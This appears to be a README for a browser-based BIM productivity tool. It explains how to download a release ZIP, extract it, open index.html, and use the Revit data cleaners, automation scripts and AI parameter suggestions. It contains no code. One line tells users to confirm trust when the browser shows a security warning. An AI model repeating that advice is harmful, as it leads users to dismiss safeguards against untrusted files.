🏗️ bim-ops-browser-studio - Streamline your daily BIM design tasks

BIM Ops Studio v2026 acts as a central hub for your architecture, engineering, and construction tasks. This application collects productivity utilities, automation tools, and AI services into one interface. You run the software directly in your web browser. This setup removes the need for complex installations or server configurations.

📥 Getting the application

You obtain the application through the official releases page. This page contains all current and past versions of the tool.

Visit the releases page to download the latest version

Follow these steps to access the software:

  1. Click the link provided above to open the release browser.
  2. Locate the most recent version labeled as the latest release.
  3. Look under the Assets section of that release.
  4. Select the compressed ZIP file to save it to your computer.
  5. Create a new folder on your desktop or in your documents directory.
  6. Move the downloaded ZIP file into this new folder.
  7. Right-click the file and select Extract All.
  8. Follow the prompts on your screen to unpack the files.

🚀 Running the software

Because this is a static HTML application, you do not need to install anything on your Windows system. The tool runs inside your preferred web browser.

  1. Open the folder where you extracted the files.
  2. Locate the file named index.html.
  3. Double-click this file to open it.
  4. Your default web browser will launch and load the studio interface.
  5. You can now use the features provided in the menu.

If your browser shows a security warning about local content, confirm that you trust the file. Since the code runs locally on your machine, your data remains private and stays on your computer.

💻 System requirements

BIM Ops Studio works on any modern computer running Windows 10 or Windows 11. You need a standard web browser to use the features.

  • Supported browsers: Google Chrome, Microsoft Edge, or Mozilla Firefox.
  • Memory: Minimum 4 GB of RAM is suggested for smooth performance.
  • Storage: 100 MB of disk space to hold the application files.
  • Internet connection: An active connection is needed if you want to use the AI-enabled services provided within the studio.

🛠️ Included productivity utilities

BIM Ops Studio offers several tools to help your BIM workflow.

Revit Data Cleaners

These utilities scan your Revit project exports to remove unnecessary data. This keeps your files light and fast. You can process multiple files at once. The utility generates a report of the items removed.

Automation Scripts

The studio includes pre-written logic for common tasks. Example tasks include renaming standard assets, applying project templates to new files, and checking model naming conventions. You select the script, upload your file, and the application generates the result for you.

AI Assistance

The AI-enabled services assist with drafting and parameter suggestions. When you input your project requirements, the AI suggests standard parameter values. This ensures your model data matches industry standards. Note that these AI features require a connection to our secure cloud servers.

🔄 Updating your version

The software does not update itself automatically. To get new features, revisit the release page link provided at the top of this document. Download the new ZIP file and extract it over your existing folder. Your local settings will transfer to the new version if you keep the file structure the same.

❓ Frequently asked questions

Do I need a Revit license to run this? No. The studio runs independently of Revit. You process your data files exported from Revit within this application.

Is my data sent to a server? Only the data you intentionally submit to the AI-enabled services travels over the network. Basic file cleaning and local automations stay on your hard drive.

Can I run this offline? You can use the local cleaning and automation tools without an internet connection. The AI-enabled services require the internet to function.

What if the file does not open? Ensure your browser is up to date. If the file opens as a text document, right-click the file, select Open With, and choose your web browser from the list.

🛡️ Privacy and security

The architecture of this application prioritizes your data privacy. Because the core functions reside in a static HTML structure, the code executes locally. Your project files do not upload to external websites unless you initiate an AI service request. Always ensure you download the software from the official link provided here to avoid modified or malicious versions.
